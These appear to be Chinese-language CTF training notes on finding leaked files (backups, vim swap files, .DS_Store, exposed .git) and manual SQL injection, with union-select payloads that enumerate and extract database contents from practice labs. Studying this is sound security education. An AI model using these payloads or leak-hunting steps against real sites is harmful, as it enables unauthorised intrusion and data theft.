信息泄露
1.目录遍历:点开文件,在目录中找到Flag(嵌套文件、分别查找)。
2.PHPINFO:开启题目后会得到一个Flag表,ctrl+f输入flag进行搜索,找到flag。
3.备份文件下载:1.网站源码:在kali 中使用dirsearch扫描,在户端中添加./dirsearch.py -u 目标网址 -e*(php),开始扫描,最终找到www.zip,在网址后添加它,在下载那边得到一个www.zip文件,打开文件,复制含有txt的文件到网址后,得到flag。
2.bak文件:在网址后添加/index.php.bak后,在下载那得到index.php.bak文件,打开得到flag。
3.vim缓存:考点:vim 交换文件名在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容以 index.php 为例:第一次产生的交换文件名为 .index.php.swp
再次意外退出后,将会产生名为 .index.php.swo
的交换文件
第三次产生的交换文件则为 .index.php.swn
。
1.使用dirsearch扫描
扫描完成后找到其目标路径,然后再在网址后添加/.index.php.swp得到文件,打开文件得到flag。
4…DS_Store:直接访问.DS_Store(在网址后加/.DS_Store),得到一个隐藏文件,打开发现 $ 9 4 8 d f 1 1 d 9 4 0 3 0 5 9 d 7 c 5 b 0 6 e 6 0 8 d 7 0 2 a 4 . t x tnoteustr f l a g h e r e ! 其中noteustr是注释的意思,使用splmap处理,>>>b=‘9 4 8 d f 1 1 d 9 4 0 3 0 5 9 d 7 c 5 b 0 6 e 6 0 8 d 7 0 2 a 4 . t x t’,>>>b.replace(’ ‘,’'),回车得到948df11d9403059d7c5b06e608d702a4.txt,将其添加网址后得到flag。
5.Git泄露:kali使用GitHack
python GitHack.py url/.git/
1.git log 令用于显示提交日志信息。
2.git show 命令用于显示各种类型的对象。
3.git stash list 当要记录工作日录和索引的当前状态,但想要返回到干净的工作目录时,则使用git stash。 该命令保存木地修改,并恢复工作目录以匹配HEAD提交,这个命令所储藏的修改可以使用git stash list列山。
4.git stash pop 从git 中获取到最近一次stash进去的内容,恢复工作区的内容取之后,会删除栈中对应的stash。
5.git diff 命令用于显示提交和工作树等之间的更改。此命令比较的是工作目录中当前文件和暂存区域快照之间的差异,也就是修改之后还没有暂存起来的变化内容
Log:使用kali中的dirsearch扫描发现有git目录,因此点开 GitHack,记得使用root用户,在GitHack中添加python GitHack.py URL/.git/回车,
进入此目录git log看到flag
git diff 前面两串数字拿到flag
Stash
先用dirsearch扫描,发现有git泄露,因此使用GitHack,添加python GitHack.py URL/.git,回车后利用git stash list 列出Git栈内的所有备份,可以利用这个列表来决定从那个地方恢复。然后利用git stash pop或者git stash apply从Git栈中读取最近一次保存的内容,恢复工作区的相关内容。由于可能存在多个Stash的内容,所以用栈来管理,pop会从最近的一个stash中读取内容并恢复。ls-a查看,cat ~~.txt得到flag。
Index
与Log方法一致
密码口令:1.弱口令:抓包爆破,得到用户名:admin,密码:admin666
2.默认口令:上网查找亿邮邮件网关默认用户和密码
SQL注入
1.整数型注入:知识点:
判断注入点 —— 第一步
找页面与数据库产生交互的地方。
我们找到界面中的 url :
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1
11
这一长串url中 ’ ? ’ 后跟的就是参数id=1
,’ ? ’ 表示传参。一般来讲 ’ ? '的内容都是用户可控的。若不存在能够与数据库产生交互的地方,那么sql注入也就自然无处下手了。
这里id=
后面的内容就可以进行参数修改啦。
传入SQL语句可控参数分为两类
- 数字类型,参数不用被引号引用
?id=1
- 其他类型,参数需要被引号引用
?name="phone"
我们尝试一下修改参数
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=2
11
可以看到界面的查询结果改变了
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2
11
界面报错
证实此处的传参的确将用户输入当做代码执行了,即存在sql注入漏洞。
判断字段数 —— 第二步
使用order by子句,利用网页报错判断字段数,为下一步铺垫
order by 函数具体用法放在这啦,就不详细展开讲了。
ORDER BY 语句用于根据指定的列对结果集进行排序。
我们从order by 1
开始尝试
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 1
11
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 2
11
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 3
11
以上操作界面均显示正常
但是当改为 order by 4
时,界面报错
由此我们可以得出:说明此处存在三个字段
判断回显点 —— 第三步
接下来我们要使用union select语句,联合查询,通过页面回显找到回显点,再利用其获取我们需要查询的数据。
前置知识:
select 语句用于从表中选取数据。
union 操作符用于合并两个或多个 SELECT 语句的结果集。
注意:
UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。
什么意思呢? 就是联合查询前后的两个表,第一个表的字段数与第二个表的字段数必须相等,否则就会报错。像这样:
那如果一个表的字段数与第二个表的字段数不相等怎么办呢?我们可以进行如下操作手动补全:
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 union select 1,2,3
11
这样就显示正常了
但我们会发现,这个界面与初始界面一模一样。
因为这里优先显示的是联合查询的第一个结果,而第二个结果未被显示。
所以我们只需要在这里使联合查询的第一个结果不显示(使前半段语句为假,则不返回任何内容):
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,3
11
我们发现”Your Login Name“后显示的是第二个字段的内容
“Password” 后显示的是第三个字段的内容
保险起见我们验证一下:
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,222,333
11
证实了我们的猜想。
由此可以得到,回显点就在”Your Login Name“和"Password" 后的位置
查询相关内容 —— 第四步
接下来我们利用显错位获取相关内容,这里我们再分几步进行
mysql中的information_schema说明
information_schema : mysql数据库5.0以上版本,自带数据库,记录了mysql下所有的库名,表名,列名等信息。
主要用到以下几个:
- schemata表 (mysql服务器中所有数据库信息的表)
- tables表 (mysql服务器中所有表信息的表)
- columns表(mysql服务器所有列信息的表)
- table_schema 数据库名
- table_name 表名
- column_name 列名
判断库名
MySQL中的 database()函数 返回默认或当前数据库的名称。
在刚刚的回显点加入database函数,以此得到库名
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,database(),database()
11
获得数据库库名:error
判断表名
为了查询表名,我们将union后的语句改成:
union select 1,table_name,3 from information_schema.tables where table_schema='error'
11
下面对这段语句进行详细解释:
回顾一下 select语句 用于从表中选取数据:
SELECT_(列名1,2,3,…)_ FROM _(表名)
已知回显点在列名2和列名3,我们将需要查询返回的数据放在回显点处。
table_name
列在information_schema
库的tables
表下。
注意这里不能直接写表名tables, 否则它会在error
库下找tables表,找不到就会报错。
因此需要使用【库名.表名】的格式:information_schema.tables
where子句 用于规定选择的标准。
WHERE_(限定条件)
我们需要查询的是error
库的表名,因此在查询中限定table_schema='error'
.
也就是返回本张表中所有table_schema
这一字段的值为error
的数据所对应的table_name
值。
好了,现在我们实践一下:
http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error'
11
为了显示union select后的内容,我们同样在前面加上and 1=2
得到一个表名:error_flag
判断列名
同理,列column_name
在表information_schema.column
下
union后修改为
union select 1,column_name,3 from information_schema.columns where table_schema='error' and table_name='error_flag'
11
得到一个列名:ld
但是如何查询其他列名?这里我们需要用到limit子句。
limit子句 用于强制 SELECT 语句返回指定的记录数。
LIMIT_(参数1),(参数2)
第一个参数指定第一个返回记录行的偏移量(注意这里从0计数),第二个参数指定返回记录行的最大数目。
即 第(参数1)+1个数据 到 第(参数1+参数2)+1个数据
实践一下,查询第二个列名 limit 1,1
union select 1,column_name,3 from information_schema.columns where table_schema='error' and table_name='error_flag' limit 1,1
11
得到第二个列名:flag
当然也可以利用group_concat()
函数 一起输出所有列名 (不推荐,有可能回显点有字符输出限制导致输出不完整)
union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='error' and table_name='error_flag'
11
查询具体信息
靶场小任务
我们现在已经找到了flag字段所在的列名error_flag
接下来直接使用SELECT语句就可以直接查询flag的内容
union select 1,flag,3 from error_flag
11
得到flag字段的具体信息: zKaQ-Nf
总结
SQL手注四部曲:
- 判断注入点
id=1 and 1=2
- 判断字段数
id=1 order by 1
- 判断回显点
id=1 and 1=2 union select 1,2,3
字符型注入:
原理:
执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。
(与报错注入不同在拥有回显点,报错注入没有回显点需要通过错误信息查看结果)
注入方法:
根据报错的sql语句信息,查看sql语句样子,继而构造注入语句
构造单引号‘、双引号“、括号)闭合查询语句,直到报错证明注入点存在
地址栏输入#这类的要用16进制编码(网页传输方便的编码)
如:’#’ %23 注释
'- -'注释 一般用- -+即- - 即- -%20
(空格) %20
注入步骤:
(sqli-labs-master第一关演示)
找到注入点
单引号闭合,发生过报错—注入点存在,且观察报错语句是单引号闭合
作为对比观察一下用双引号,没有任何报错信息
- ps:为什么会报错呢:因为查询语句为(可以在sqli-labs-master安装目录下找到php源代码查看)
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
11
- 用户正常输入合法的查询数据 即1 2 3的时候语句为
$sql="SELECT * FROM users WHERE id='1' LIMIT 0,1";
11
- 这时就会查询数据库并输出我们想要查询的信息
- 而当我们输入了单引号的时候,语句就会变成
$sql="SELECT * FROM users WHERE id='1'' LIMIT 0,1";
11
- 这样就会产生错误,因为单数个的单引号使得查询语句不能闭合
- 而当成功闭合查询语句的单引号后如果加上注释符,语句就会变成
$sql="SELECT * FROM users WHERE id='1' #' LIMIT 0,1";
11
- 注释符后面的无用,可以忽略,因此语句变成
$sql="SELECT * FROM users WHERE id='1' #
11
- 而#之前的内容是我们可以输入的,于是就可以构造出
$sql="SELECT * FROM users WHERE id='1' order by 3#
11
- 这样的攻击语句 来获得数据库内部的信息,成功攻击
- 同理:
$sql="SELECT * FROM users WHERE id='' union select 1,2,3#
11
order by爆字段数
order by 3不报错证明有第三列
order by 4的时候报错,证明没有第四列
union select 1,2,3爆回显点
这里回显点为第2,3位
- ps:联合查询如果前面得到了结果就不会执行后面的了,所以要id=’ union select ……
- 让前面查询结果为空
于是:
union select 1,database(),version()%23 # 通过回显点查询需要信息
11
- information_schema库:mysql自带的库,内有所有数据库的所有信息
- 如:所有的表名tables和字段columns库名schemata
- 因此可以利用来获取表名和列名
' union select 1,group_concat(table_name),user() from information_schema.tables where table_schema = database() %23 # 查出表名
11
- 获取多个数据只有一个显示位置用group_concat拼接,拼接,隔开,或者limit一条一条查询也行
继续:
' union select 1,group_concat(column_name),user() from information_schema.columns where table_name = ‘emails’ %23
11
获取列名
- where条件是字符串的话要加引号,且注意是英文引号
继续获取到表内内容
' union select 1,2,group_concat(email_id) from emails --+
11
成功获取到邮箱表内email_id列的内容
- 同理 获取邮箱表内id列的内容
' union select 1,2,group_concat(id) from emails --+
11
数字型注入
原理
同字符型注入
步骤
同字符型注入
不同:
sql语句不带’具体详见sql_lab less 1 和less 2 的区别,
因为数字可以不带’所以数字型报错注入的sql语句如:where id = 而不是where id =’’
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; # 数字
1212
数字型注入不需要注释,也可以注释,因为注释只是为了注释掉我们闭合后剩余的’